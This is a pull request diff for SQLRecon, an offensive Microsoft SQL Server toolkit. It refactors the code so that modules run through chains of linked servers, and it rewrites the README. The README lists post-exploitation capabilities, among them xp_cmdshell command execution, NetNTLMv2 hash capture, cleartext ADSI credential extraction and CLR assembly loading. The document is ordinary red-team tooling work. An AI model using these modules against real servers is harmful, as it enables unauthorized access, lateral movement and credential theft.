### PR TITLE
Enhancing impersonation, adding tunnelling capabilities and some refactoring 

### DIFF
--- a/README.md
+++ b/README.md
@@ -63,7 +63,7 @@ SqlSpns - Use the current user token to enumerate the current AD domain for MSSQ
         /d:, /domain: | (OPTIONAL) NETBIOS name (DOMAIN) or FQDN of domain (DOMAIN.COM)
 ```
 
-## Authentication Providers
+### Authentication Providers
 
 SQLRecon supports a diverse set of authentication providers to enable interacting with a Microsoft SQL Server. An authentication provider must be supplied (`/a:, /auth:`).
 
@@ -110,7 +110,7 @@ SQLRecon connects to the `master` database by default, however, this can be chan
 
 Please note that the `AzureAD` authentication provider reqires that the Azure Active Directory Authentication Library (ADAL) or Microsoft Authentication Library (MSAL) exists on the system SQLRecon is executed from. This is for Azure Active Directory authentication and authorization functionality.
 
-## Standard Modules
+### Standard Modules
 
 Standard modules are executed against a single instance of Microsoft SQL server. Standard modules must be passed into the module flag (`/m:, /module:`).
 

--- a/README.md
+++ b/README.md
@@ -300,7 +300,7 @@ If you are interested in extending SQLRecon, refer to the write up in the <a hre
 
 * Renamed `EnableDisable.cs` to `ConfigureOptions.cs`
 * Overhauled advanced option configurations.
-* Implemented RPC error checking wherever `ExecuteLinkedCustomQueryRpcExec` is called.
+* Implemented RPC error checking wherever `ExecuteTunnelCustomQueryRpcExec` is called.
 </details>
 
 <details>
@@ -363,7 +363,7 @@ If you are interested in extending SQLRecon, refer to the write up in the <a hre
 
 * Various bug fixed in the SCCM modules.
 * Organized the help menu using a table.
-* Improved the output provided by `ExecuteLinkedCustomQueryRpcExec`.
+* Improved the output provided by `ExecuteTunnelCustomQueryRpcExec`.
 * Improved code commenting through out.
 * Improved consistency of method names across command execution functions.
 * Improved modularity through better use of object oriented programming.

--- a/README.md
+++ b/README.md
@@ -29,11 +29,30 @@ SQLRecon is a Microsoft SQL Server toolkit that is designed for offensive reconn
 
 Check out my blog post on the <a href="https://securityintelligence.com/posts/databases-beware-abusing-microsoft-sql-server-with-sqlrecon/">IBM Security Intelligence</a> website.
 
-# Overview
+## Overview
 
 You can download a copy of SQLRecon from the [releases](https://github.com/skahwah/SQLRecon/releases) page. Alternatively, feel free to compile the solution yourself. This should be as straight forward as cloning the repo, double clicking the solution file and building.
 
-## Enumeration
+## Features
+
+`SQLRecon` is equipped with powerful capabilities designed for sophisticated reconnaissance and post-exploitation within Microsoft SQL Server environments:
+- **Active Directory Enumeration**: Discover Server Principal Names (SPNs) associated with SQL Servers to identify potential targets.
+- **Linked Server Operations**: Executes commands across linked SQL Server chains for lateral movement.
+- **User Impersonation**: Impersonates SQL Server users to elevate privileges and access restricted data.
+- **Multiple Authentication Providers**:
+    - **Windows Integrated Authentication**: Uses the current user's token.
+    - **Active Directory Credentials**: Uses specific domain credentials.
+    - **Local SQL Credentials**: Connects using SQL Server usernames and passwords.
+    - **Advanced SQL Server Interaction**:
+        - **Query Execution**: Executes custom SQL queries.
+        - **Schema Retrieval**: Fetches database schema information.
+        - **System Procedure Enablement**: Enables procedures like `xp_cmdshell`.
+- **SCCM Reconnaissance**: Targets Microsoft SCCM environments to extract configuration details.
+
+
+## Getting Started
+
+### Enumeration
 
 SQLRecon supports enumerating Active Directory for Server Principal Names (SPNs) that are associated with Microsoft SQL Server.
 
@@ -127,83 +146,6 @@ CheckRpc                                                 | Obtain a list of link
 [*] AgentStatus                                          | Display if SQL agent is running and obtain agent jobs
 [*] AgentCmd /c:COMMAND                                  | Execute a system command using agent jobs
 [*] Adsi /rhost:ADSI_SERVER_NAME /lport:LDAP_SERVER_PORT | Obtain cleartext ADSI credentials from a linked ADSI server
-```
-
-## Linked Modules
-
-Linked modules are executed on a linked Microsoft SQL server. 
-
-All linked modules have the following minimum requirements:
-- A linked SQL server must be specified (`/l:, /lhost:`).
-- A linked module must be specified (`/m:, /module:`). 
-
-Modules starting with `[*]` require the sysadmin role or a similar privileged context.
-
-For detailed information on how to use each technique, refer to the <a href="https://github.com/skahwah/SQLRecon/wiki/4.-Linked-Modules">wiki</a>. 
-
-```
-lQuery /l:LINKED_HOST /c:QUERY                                           | Execute a SQL query
-lWhoami /l:LINKED_HOST                                                   | Display what user you are logged in as, mapped as and what roles exist
-lUsers /l:LINKED_HOST                                                    | Display what user accounts and groups can authenticate against the database
-lDatabases /l:LINKED_HOST                                                | Display all databases
-lTables /l:LINKED_HOST /db:DATABASE                                      | Display all tables in the supplied database
-lColumns /l:LINKED_HOST /db:DATABASE /table:TABLE                        | Display all columns in the supplied database and table
-lRows /l:LINKED_HOST /db:DATABASE /table:TABLE                           | Display the number of rows in the supplied database and table
-lSearch /l:LINKED_HOST /db:DATABASE /keyword:KEYWORD                     | Search column names in the supplied table of the database you are connected to
-lSmb /l:LINKED_HOST /rhost:UNC_PATH                                      | Capture NetNTLMv2 hash
-lLinks /l:LINKED_HOST                                                    | Enumerate linked SQL servers on a linked SQL server
-lCheckRpc /l:LINKED_HOST                                                 | Obtain a list of linked servers on the linked server and their RPC status
-[*] lEnableXp /l:LINKED_HOST                                             | Enable xp_cmdshell
-[*] lDisableXp /l:LINKED_HOST                                            | Disable xp_cmdshell
-[*] lXpCmd /l:LINKED_HOST /c:COMMAND                                     | Execute a system command using xp_cmdshell
-[*] lEnableOle /l:LINKED_HOST                                            | Enable OLE automation procedures
-[*] lDisableOle /l:LINKED_HOST                                           | Disable OLE automation procedures
-[*] lOleCmd /l:LINKED_HOST /c:COMMAND                                    | Execute a system command using OLE automation procedures
-[*] lEnableClr /l:LINKED_HOST                                            | Enable CLR integration
-[*] lDisableClr /l:LINKED_HOST                                           | Disable CLR integration
-[*] lClr /l:LINKED_HOST /dll:DLL /function:FUNCTION                      | Load and execute a .NET assembly in a custom stored procedure
-[*] lAgentStatus /l:LINKED_HOST                                          | Display if SQL agent is running and obtain agent jobs
-[*] lAgentCmd /l:LINKED_HOST /c:COMMAND                                  | Execute a system command using agent jobs
-[*] lAdsi /l:LINKED_HOST /rhost:ADSI_SERVER_NAME /lport:LDAP_SERVER_PORT | Obtain cleartext ADSI credentials from a double-linked ADSI server
-```
-
-## Impersonation Modules
-
-Impersonation modules are executed against a single instance of Microsoft SQL server, under the context of an impersonated SQL user.
-
-All impersonation modules have the following minimum requirements:
-- An impersonation user must be specified (`/i:, /iuser:`).
-- An impersonation module must be specified (`/m:, /module:`).
-
-Modules starting with `[*]` require the sysadmin role or a similar privileged context.
-
-For detailed information on how to use each technique, refer to the <a href="https://github.com/skahwah/SQLRecon/wiki/5.-Impersonation-Modules">wiki</a>. 
-
-```
-iQuery /i:IMPERSONATE_USER /c:QUERY                                           | Execute a SQL query
-iWhoami /i:IMPERSONATE_USER                                                   | Display what user you are logged in as, mapped as and what roles exist
-iUsers /i:IMPERSONATE_USER                                                    | Display what user accounts and groups can authenticate against the database
-iDatabases /i:IMPERSONATE_USER                                                | Display all databases
-iTables /i:IMPERSONATE_USER /db:DATABASE                                      | Display all tables in the supplied database
-iColumns /i:IMPERSONATE_USER /db:DATABASE /table:TABLE                        | Show all columns in the database and table you specify
-iRows /i:IMPERSONATE_USER /db:DATABASE /table:TABLE                           | Display the number of rows in the database and table you specify
-iSearch /i:IMPERSONATE_USER /keyword:KEYWORD                                  | Search column names in the supplied table of the database you are connected to
-iLinks /i:IMPERSONATE_USER                                                    | Enumerate linked SQL servers
-iCheckRpc /i:IMPERSONATE_USER                                                 | Obtain a list of linked servers and their RPC status
-[*] iEnableRpc /i:IMPERSONATE_USER /rhost:LINKED_HOST                         | Enable RPC and RPC out on a linked server
-[*] iDisableRpc /i:IMPERSONATE_USER /rhost:LINKED_HOST                        | Disable RPC and RPC out on a linked server
-[*] iEnableXp /i:IMPERSONATE_USER                                             | Enable xp_cmdshell
-[*] iDisableXp /i:IMPERSONATE_USER                                            | Disable xp_cmdshell
-[*] iXpCmd /i:IMPERSONATE_USER /c:COMMAND                                     | Execute a system command using xp_cmdshell
-[*] iEnableOle /i:IMPERSONATE_USER                                            | Enable OLE automation procedures
-[*] iDisableOle /i:IMPERSONATE_USER                                           | Disable OLE automation procedures
-[*] iOleCmd /i:IMPERSONATE_USER /c:COMMAND                                    | Execute a system command using OLE automation procedures
-[*] iEnableClr /i:IMPERSONATE_USER                                            | Enable CLR integration
-[*] iDisableClr /i:IMPERSONATE_USER                                           | Disable CLR integration
-[*] iClr /i:IMPERSONATE_USER /dll:DLL /function:FUNCTION                      | Load and execute a .NET assembly in a custom stored procedure
-[*] iAgentStatus /i:IMPERSONATE_USER                                          | Display if SQL agent is running and obtain agent jobs
-[*] iAgentCmd /i:IMPERSONATE_USER /c:COMMAND                                  | Execute a system command using agent jobs
-[*] iAdsi /i:IMPERSONATE_USER /rhost:ADSI_SERVER_NAME /lport:LDAP_SERVER_PORT | Obtain cleartext ADSI credentials from a linked ADSI server
 ```
 
 ## SCCM Modules

--- a/SQLRecon/SQLRecon.sln
+++ b/SQLRecon/SQLRecon.sln
@@ -1,7 +1,7 @@
 ﻿
 Microsoft Visual Studio Solution File, Format Version 12.00
-# Visual Studio Version 16
-VisualStudioVersion = 16.0.30907.101
+# Visual Studio Version 17
+VisualStudioVersion = 17.9.34701.34
 MinimumVisualStudioVersion = 10.0.40219.1
 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SQLRecon", "SQLRecon\SQLRecon.csproj", "{612C7C82-D501-417A-B8DB-73204FDFDA06}"
 EndProject
@@ -13,14 +13,14 @@ Global
 		Release|x64 = Release|x64
 	EndGlobalSection
 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{612C7C82-D501-417A-B8DB-73204FDFDA06}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+		{612C7C82-D501-417A-B8DB-73204FDFDA06}.Debug|Any CPU.Build.0 = Debug|Any CPU
 		{612C7C82-D501-417A-B8DB-73204FDFDA06}.Debug|x64.ActiveCfg = Release|x64
 		{612C7C82-D501-417A-B8DB-73204FDFDA06}.Debug|x64.Build.0 = Release|x64
 		{612C7C82-D501-417A-B8DB-73204FDFDA06}.Release|Any CPU.ActiveCfg = Release|Any CPU
 		{612C7C82-D501-417A-B8DB-73204FDFDA06}.Release|Any CPU.Build.0 = Release|Any CPU
 		{612C7C82-D501-417A-B8DB-73204FDFDA06}.Release|x64.ActiveCfg = Release|x64
 		{612C7C82-D501-417A-B8DB-73204FDFDA06}.Release|x64.Build.0 = Release|x64
-		{612C7C82-D501-417A-B8DB-73204FDFDA06}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
-		{612C7C82-D501-417A-B8DB-73204FDFDA06}.Debug|Any CPU.Build.0 = Debug|Any CPU
 	EndGlobalSection
 	GlobalSection(SolutionProperties) = preSolution
 		HideSolutionNode = FALSE

--- a/SQLRecon/SQLRecon/Program.cs
+++ b/SQLRecon/SQLRecon/Program.cs
@@ -31,7 +31,10 @@ namespace SQLRecon
                     {
                         // Set the authentication type, if conditions have passed, evaluate the arguments.
                         if (SetAuthenticationType.EvaluateAuthenticationType(parsedArgs))
+                        {
                             ArgumentLogic.EvaluateTheArguments(parsedArgs);
+                        }
+                            
                     }
                     else if (parsedArgs.ContainsKey("enum"))
                     {

--- a/SQLRecon/SQLRecon/Program.cs
+++ b/SQLRecon/SQLRecon/Program.cs
@@ -1,5 +1,6 @@
 ﻿using System;
 using System.Collections.Generic;
+using System.Linq;
 using SQLRecon.Utilities;
 
 namespace SQLRecon
@@ -27,18 +28,17 @@ namespace SQLRecon
                         // Go no further
                         return;
 
-                    if (parsedArgs.ContainsKey("auth"))
+                    if (parsedArgs.ContainsKey("enum"))
+                    {
+                        SetEnumerationType.EvaluateEnumerationType(parsedArgs);
+                    }
+                    else if (parsedArgs.Any())
                     {
                         // Set the authentication type, if conditions have passed, evaluate the arguments.
                         if (SetAuthenticationType.EvaluateAuthenticationType(parsedArgs))
                         {
                             ArgumentLogic.EvaluateTheArguments(parsedArgs);
                         }
-                            
-                    }
-                    else if (parsedArgs.ContainsKey("enum"))
-                    {
-                        SetEnumerationType.EvaluateEnumerationType(parsedArgs);
                     }
                     else
                     {

--- a/SQLRecon/SQLRecon/Program.cs
+++ b/SQLRecon/SQLRecon/Program.cs
@@ -53,7 +53,7 @@ namespace SQLRecon
                     return;
                 }
             }
-        } 
+        }
 
 
     }

--- a/SQLRecon/SQLRecon/commands/GlobalVariables.cs
+++ b/SQLRecon/SQLRecon/commands/GlobalVariables.cs
@@ -13,7 +13,6 @@ namespace SQLRecon.Commands
         private static string _database = "master";
         private static string _domain;
         private static string _impersonate;
-        private static string _linkedSqlServer;
         private static string[] _tunnelSqlServer;
         private static string _tunnelPath;
         private static string _module;
@@ -21,6 +20,8 @@ namespace SQLRecon.Commands
         private static string _port = "1433";
         private static string _sqlServer;
         private static string _username;
+
+        private static bool _debug = false;
 
         public Dictionary<string, string> CoreCommands
         {
@@ -39,14 +40,15 @@ namespace SQLRecon.Commands
                     {"m", "module"},
                     {"o", "option"},
                     {"p", "password"},
-                    {"u", "username"}
+                    {"u", "username"},
+                    {"debug", "debug"},
                 };
             }
         }
 
         public Dictionary<string, int> StandardArgumentsAndOptionCount
         {
-            get 
+            get
             {
                 return new Dictionary<string, int>()
                 {
@@ -81,88 +83,6 @@ namespace SQLRecon.Commands
             }
         }
 
-        public Dictionary<string, int> ImpersonationArgumentsAndOptionCount
-        {
-            get
-            {
-                return new Dictionary<string, int>()
-                {
-                    {"iagentstatus", 1},
-                    {"icheckrpc", 1},
-                    {"idatabases", 1},
-                    {"idisableclr", 1},
-                    {"idisableole", 1},
-                    {"idisablexp", 1},
-                    {"ienableclr", 1},
-                    {"ienableole", 1},
-                    {"ienablexp", 1},
-                    {"ilinks", 1},
-                    {"iusers", 1},
-                    {"iwhoami", 1},
-                    {"iagentcmd", 2},
-                    {"idisablerpc", 2},
-                    {"ienablerpc", 2},
-                    {"iolecmd", 2},
-                    {"iquery", 2},
-                    {"isearch", 2},
-                    {"itables", 2},
-                    {"ixpcmd", 2},
-                    {"iadsi", 3},
-                    {"iclr", 3},
-                    {"icolumns", 3},
-                    {"irows", 3}
-                };
-            }
-        }
-
-        public Dictionary<string, int> LinkedArgumentsAndOptionCount
-        {
-            get
-            {
-                return new Dictionary<string, int>()
-                {
-                    {"lagentstatus", 1},
-                    {"lcheckrpc", 1},
-                    {"ldatabases", 1},
-                    {"ldisableclr", 1},
-                    {"ldisableole", 1},
-                    {"ldisablexp", 1},
-                    {"lenableclr", 1},
-                    {"lenableole", 1},
-                    {"lenablexp", 1},
-                    {"limpersonate", 1},
-                    {"llinks", 1},
-                    {"lusers", 1},
-                    {"lwhoami", 1},
-                    {"lagentcmd", 2},
-                    {"lolecmd", 2},
-                    {"lquery", 2},
-                    {"lsmb", 2},
-                    {"ltables", 2},
-                    {"lxpcmd", 2},
-                    {"ladsi", 3},
-                    {"lclr", 3},
-                    {"lcolumns", 3},
-                    {"lsearch", 3},
-                    {"lrows", 3}
-                };
-            }
-        }
-
-        public Dictionary<string, int> TunnelArgumentsAndOptionCount
-        {
-            get
-            {
-                return new Dictionary<string, int>()
-                {
-                    {"timpersonate", 1},
-                    {"tusers", 1},
-                    {"twhoami", 1},
-                    {"tquery", 2},
-                };
-            }
-        }
-
         public Dictionary<string, int> SccmArgumentsAndOptionCount
         {
             get
@@ -179,6 +99,18 @@ namespace SQLRecon.Commands
                     {"saddadmin", 2},
                     {"sremoveadmin", 2}
                 };
+            }
+        }
+
+        public bool Debug
+        {
+            get
+            {
+                return _debug;
+            }
+            set
+            {
+                _debug = value;
             }
         }
 
@@ -270,17 +202,6 @@ namespace SQLRecon.Commands
                 _impersonate = value;
             }
         }
-        public string LinkedSqlServer
-        {
-            get
-            {
-                return _linkedSqlServer;
-            }
-            set
-            {
-                _linkedSqlServer = value;
-            }
-        }
 
         public string[] TunnelSqlServer
         {
@@ -305,7 +226,7 @@ namespace SQLRecon.Commands
                 _module = value;
             }
         }
-        
+
         public string Password
         {
             get

--- a/SQLRecon/SQLRecon/commands/GlobalVariables.cs
+++ b/SQLRecon/SQLRecon/commands/GlobalVariables.cs
@@ -35,8 +35,7 @@ namespace SQLRecon.Commands
                     {"e", "enum"},
                     {"h", "host"},
                     {"i", "iuser"},
-                    {"l", "lhost"},
-                    {"t", "tunnel"},
+                    {"l", "link"},
                     {"m", "module"},
                     {"o", "option"},
                     {"p", "password"},
@@ -203,7 +202,7 @@ namespace SQLRecon.Commands
             }
         }
 
-        public string[] TunnelSqlServer
+        public string[] LinkChain
         {
             get
             {

--- a/SQLRecon/SQLRecon/commands/GlobalVariables.cs
+++ b/SQLRecon/SQLRecon/commands/GlobalVariables.cs
@@ -14,6 +14,8 @@ namespace SQLRecon.Commands
         private static string _domain;
         private static string _impersonate;
         private static string _linkedSqlServer;
+        private static string[] _tunnelSqlServer;
+        private static string _tunnelPath;
         private static string _module;
         private static string _password;
         private static string _port = "1433";
@@ -33,6 +35,7 @@ namespace SQLRecon.Commands
                     {"h", "host"},
                     {"i", "iuser"},
                     {"l", "lhost"},
+                    {"t", "tunnel"},
                     {"m", "module"},
                     {"o", "option"},
                     {"p", "password"},
@@ -142,6 +145,20 @@ namespace SQLRecon.Commands
                     {"lcolumns", 3},
                     {"lsearch", 3},
                     {"lrows", 3}
+                };
+            }
+        }
+
+        public Dictionary<string, int> TunnelArgumentsAndOptionCount
+        {
+            get
+            {
+                return new Dictionary<string, int>()
+                {
+                    {"timpersonate", 1},
+                    {"tusers", 1},
+                    {"twhoami", 1},
+                    {"tquery", 2},
                 };
             }
         }
@@ -264,6 +281,19 @@ namespace SQLRecon.Commands
                 _linkedSqlServer = value;
             }
         }
+
+        public string[] TunnelSqlServer
+        {
+            get
+            {
+                return _tunnelSqlServer;
+            }
+            set
+            {
+                _tunnelSqlServer = value;
+            }
+        }
+
         public string Module
         {
             get
@@ -318,6 +348,18 @@ namespace SQLRecon.Commands
             set
             {
                 _username = value;
+            }
+        }
+
+        public string TunnelPath
+        {
+            get
+            {
+                return _tunnelPath;
+            }
+            set
+            {
+                _tunnelPath = value;
             }
         }
     }

--- a/SQLRecon/SQLRecon/commands/GlobalVariables.cs
+++ b/SQLRecon/SQLRecon/commands/GlobalVariables.cs
@@ -127,6 +127,7 @@ namespace SQLRecon.Commands
                     {"lenableclr", 1},
                     {"lenableole", 1},
                     {"lenablexp", 1},
+                    {"limpersonate", 1},
                     {"llinks", 1},
                     {"lusers", 1},
                     {"lwhoami", 1},

--- a/SQLRecon/SQLRecon/commands/ModuleHandler.cs
+++ b/SQLRecon/SQLRecon/commands/ModuleHandler.cs
@@ -780,9 +780,9 @@ namespace SQLRecon.Commands
 
             // Print user details
             _print.Status($"Users in the {contextDescription}:", true);
-            _print.Nested("Database Principals:", true);
+            _print.Nested("Database Principals:\n", true);
             Console.WriteLine(dbUsers);
-            _print.Nested("Server Principals:", true);
+            _print.Nested("Server Principals:\n", true);
             Console.WriteLine(serverUsers);
         }
 

--- a/SQLRecon/SQLRecon/commands/ModuleHandler.cs
+++ b/SQLRecon/SQLRecon/commands/ModuleHandler.cs
@@ -28,12 +28,14 @@ namespace SQLRecon.Commands
         private static readonly string _arg1 = _gV.Arg1;
         private static readonly string _arg2 = _gV.Arg2;
         private static readonly string _database = _gV.Database;
-        private static readonly string _impersonate = _gV.Impersonate;
-        private static readonly string _linkedSqlServer = _gV.LinkedSqlServer;
         private static readonly string[] _tunnelSqlServer = _gV.TunnelSqlServer;
         private static readonly string _tunnelPath = _gV.TunnelPath;
         private static readonly string _module = _gV.Module;
         private static readonly string _sqlServer = _gV.SqlServer;
+        private static readonly string _impersonate = _gV.Impersonate;
+
+        private static readonly string contextDescription = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0 ? $"{_sqlServer} via tunnel {string.Join(" -> ", _tunnelSqlServer)}" :
+                                        $"{_sqlServer}";
 
         private static string _query;
 
@@ -56,7 +58,7 @@ namespace SQLRecon.Commands
                 _sqlQuery.ExecuteQuery(_connection, _query)), true);
 
             _query = "SELECT USER_NAME();";
-            _print.Success(string.Format("Mapped to the username '{0}'",
+            _print.Nested(string.Format("Mapped to the username '{0}'",
                 _sqlQuery.ExecuteQuery(_connection, _query)), true);
 
             if (!string.IsNullOrEmpty(_impersonate))
@@ -88,6 +90,20 @@ namespace SQLRecon.Commands
             }
         }
 
+        /// <summary>
+        /// The info method is used against single instances of SQL server to
+        /// gather information about the remote SQL server instance.
+        /// This method needs to be public as reflection is used to match the
+        /// module name that is supplied via command line, to the actual method name.
+        /// <summary>
+        public static void info()
+        {
+            _print.Status(string.Format("Extracting current MS SQL Server information from {0}", _sqlServer), true);
+            var Info = new SqlServerInfo(_connection);
+            Info.GetAllSQLServerInfo();
+            Info.PrintInfo();
+        }
+
         /*
          * *****************************************************************
          * *****************************************************************
@@ -98,40 +114,85 @@ namespace SQLRecon.Commands
          * *****************************************************************
          */
 
+
         /// <summary>
-        /// The adsi method is used against single instances of SQL server to
-        /// obtain cleartext ADSI credentials.
-        /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
+        /// The adsi method is used to obtain cleartext ADSI credentials.
+        /// This method dynamically adjusts based on the connection type (single instance or tunneled).
+        /// </summary>
         public static void adsi()
         {
-            _print.Status(string.Format("Obtaining ADSI credentials for '{1}' on {0}", _sqlServer, _arg1), true);
-            _adsi.Standard(_connection, _arg1, _arg2);
+            _print.Status($"Obtaining ADSI credentials for '{_arg1}' on {contextDescription}", true);
+
+            if (_tunnelSqlServer != null && _tunnelSqlServer.Length > 0)
+            {
+                // 0 -> SQL27
+                if (_tunnelSqlServer.Length == 2) {
+                    string linkedServer = _tunnelSqlServer.Last();
+                    _adsi.Linked(_connection, _arg1, _arg2, linkedServer, _sqlServer);
+                    _print.Success($"Successfully obtained ADSI credentials for '{_arg1}' on {linkedServer}", true);
+                } else {
+                    _print.Warning($"Not implemented for multiple hops!", true);
+                }
+            }
+            else
+            {
+                _adsi.Standard(_connection, _arg1, _arg2);
+                _print.Success($"Successfully obtained ADSI credentials for '{_arg1}' on {contextDescription}", true);
+            }
         }
 
         /// <summary>
-        /// The agentcmd method is used against single instances of SQL server to
+        /// The agentcmd method is used against single instances or tunneled SQL servers to
         /// execute commands via agent jobs.
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
+        /// </summary>
         public static void agentcmd()
         {
-            _print.Status(string.Format("Executing '{0}' on {1}", _arg1, _sqlServer), true);
-            _agentJobs.Standard(_connection, _sqlServer, _arg1);
+            _print.Status($"Executing '{_arg1}' on {contextDescription}", true);
+
+            if (_tunnelSqlServer != null && _tunnelSqlServer.Length > 0)
+            {
+                // 0 -> SQL27
+                if (_tunnelSqlServer.Length == 2) {
+                    string linkedServer = _tunnelSqlServer.Last();
+                    _agentJobs.Linked(_connection, linkedServer, "PowerShell", _arg1, _sqlServer);
+                } else {
+                    _print.Warning($"Not implemented for multiple hops!", true);
+                }
+
+            }
+            else
+            {
+                _agentJobs.Standard(_connection, _sqlServer, _arg1);
+            }
         }
 
         /// <summary>
-        /// The agentstatus method is used against single instances of SQL server to
+        /// The agentstatus method is used against single instances or tunneled SQL servers to
         /// check to see if SQL server agent is running.
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
+        /// </summary>
         public static void agentstatus()
         {
-            _print.Status(string.Format("Getting SQL agent status on {0}", _sqlServer), true);
-            _agentJobs.GetAgentStatusAndJobs(_connection, _sqlServer);
+            _print.Status($"Getting SQL agent status on {contextDescription}", true);
+
+            if (_tunnelSqlServer != null && _tunnelSqlServer.Length > 0)
+            {
+                // 0 -> SQL27
+                if (_tunnelSqlServer.Length == 2) {
+                    string linkedServer = _tunnelSqlServer.Last();
+                    _agentJobs.GetLinkedAgentStatusAndJobs(_connection, linkedServer);
+                } else {
+                    _print.Warning($"Not implemented for multiple hops!", true);
+                }
+
+            }
+            else
+            {
+                _agentJobs.GetAgentStatusAndJobs(_connection, _sqlServer);
+            }
         }
 
         /// <summary>
@@ -139,79 +200,128 @@ namespace SQLRecon.Commands
         /// identify what systems can have RPC enabled.
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
+        /// </summary>
         public static void checkrpc()
         {
-            _print.Status(string.Format("The following SQL servers can have RPC configured via {0}", _sqlServer), true);
+            _print.Status($"The following SQL servers can have RPC configured via {contextDescription}", true);
             _query = "SELECT name, is_rpc_out_enabled FROM sys.servers";
-            _print.IsOutputEmpty(_sqlQuery.ExecuteCustomQuery(_connection, _query), true);
+
+            if (_tunnelSqlServer != null && _tunnelSqlServer.Length > 0)
+            {
+                _print.IsOutputEmpty(_sqlQuery.ExecuteTunnelCustomQuery(_connection, _tunnelSqlServer, _query), true);
+            }
+            else
+            {
+                _print.IsOutputEmpty(_sqlQuery.ExecuteCustomQuery(_connection, _query), true);
+            }
         }
 
         /// <summary>
-        /// The clr method is used against single instances of SQL server to
+        /// The clr method is used against single instances or tunneled SQL servers to
         /// execute custom .NET CLR assemblies.
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
+        /// </summary>
         public static void clr()
         {
-            _print.Status(string.Format("Performing CLR custom assembly attack on {0}", _sqlServer), true);
-            _clr.Standard(_connection, _arg1, _arg2);
+            _print.Status($"Performing CLR custom assembly attack on {contextDescription}", true);
+
+            if (_tunnelSqlServer != null && _tunnelSqlServer.Length > 0)
+            {
+                // 0 -> SQL27
+                if (_tunnelSqlServer.Length == 2) {
+                    string linkedServer = _tunnelSqlServer.Last();
+                    _clr.Linked(_connection, _arg1, _arg2, linkedServer, _sqlServer);
+                } else {
+                    _print.Warning($"Not implemented for multiple hops!", true);
+                }
+            }
+            else
+            {
+                _clr.Standard(_connection, _arg1, _arg2);
+            }
         }
 
+
         /// <summary>
-        /// The columns method is used against single instances of SQL server to
+        /// The columns method is used against single instances or tunneled SQL servers to
         /// list the columns for a table in a database.
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
         /// </summary>
         public static void columns()
         {
-            _print.Status(string.Format("Displaying columns from table '{1}' in '{0}' on {2}",
-                _arg1, _arg2, _sqlServer), true);
+            _print.Status($"Displaying columns from table '{_arg2}' in '{_arg1}' on {contextDescription}", true);
 
             _query = "use " + _arg1 + ";" +
-                "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS " +
-                "WHERE TABLE_NAME = '" + _arg2 + "' ORDER BY ORDINAL_POSITION;";
+                    "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS " +
+                    "WHERE TABLE_NAME = '" + _arg2 + "' ORDER BY ORDINAL_POSITION;";
 
-            _print.IsOutputEmpty(_sqlQuery.ExecuteCustomQuery(_connection, _query), true);
+            if (_tunnelSqlServer != null && _tunnelSqlServer.Length > 0)
+            {
+                _print.IsOutputEmpty(_sqlQuery.ExecuteTunnelCustomQuery(_connection, _tunnelSqlServer, _query), true);
+            }
+            else
+            {
+                _print.IsOutputEmpty(_sqlQuery.ExecuteCustomQuery(_connection, _query), true);
+            }
         }
 
         /// <summary>
-        /// The databases method is used against single instances of SQL server to
+        /// The databases method is used against single instances or tunneled SQL servers to
         /// show all configured databases.
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
+        /// </summary>
         public static void databases()
         {
-            _print.Status(string.Format("Databases on {0}", _sqlServer), true);
+            _print.Status($"Databases on {contextDescription}", true);
             _query = "SELECT dbid, name, crdate, filename FROM master.dbo.sysdatabases;";
+
+            if (_tunnelSqlServer != null && _tunnelSqlServer.Length > 0)
+            {
+                Console.WriteLine(_sqlQuery.ExecuteTunnelCustomQuery(_connection, _tunnelSqlServer, _query));
+                return;
+            }
             Console.WriteLine(_sqlQuery.ExecuteCustomQuery(_connection, _query));
         }
 
         /// <summary>
-        /// The disableclr method is used against single instances of SQL server to
+        /// The disableclr method is used against single instances or tunneled SQL servers to
         /// disable CLR integration.
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
+        /// </summary>
         public static void disableclr()
         {
-            _print.Status(string.Format("Disabling CLR integration on {0}", _sqlServer), true);
-            _config.ModuleToggle(_connection, "clr enabled", "0", _sqlServer);
+            _print.Status($"Disabling CLR integration on {contextDescription}", true);
+            if (_tunnelSqlServer != null && _tunnelSqlServer.Length > 0)
+            {
+                _config.TunnelModuleToggle(_connection, "clr enabled", "0", _tunnelSqlServer, _sqlServer);
+            }
+            else
+            {
+                _config.ModuleToggle(_connection, "clr enabled", "0", _sqlServer);
+            }
         }
 
         /// <summary>
-        /// The disableole method is used against single instances of SQL server to
+        /// The disableole method is used against single instances or tunneled SQL servers to
         /// disable OLE automation.
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
+        /// </summary>
         public static void disableole()
         {
-            _print.Status(string.Format("Disabling Ole Automation Procedures on {0}", _sqlServer), true);
-            _config.ModuleToggle(_connection, "Ole Automation Procedures", "0", _sqlServer);
+            _print.Status($"Disabling Ole Automation Procedures on {contextDescription}", true);
+            if (_tunnelSqlServer != null && _tunnelSqlServer.Length > 0)
+            {
+                _config.TunnelModuleToggle(_connection, "Ole Automation Procedures", "0", _tunnelSqlServer, _sqlServer);
+            }
+            else
+            {
+                _config.ModuleToggle(_connection, "Ole Automation Procedures", "0", _sqlServer);
+            }
         }
 
         /// <summary>
@@ -219,90 +329,118 @@ namespace SQLRecon.Commands
         /// disable 'rpc out' on a specified SQL server.
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
-        /// <summary>
+        /// </summary>
         public static void disablerpc()
         {
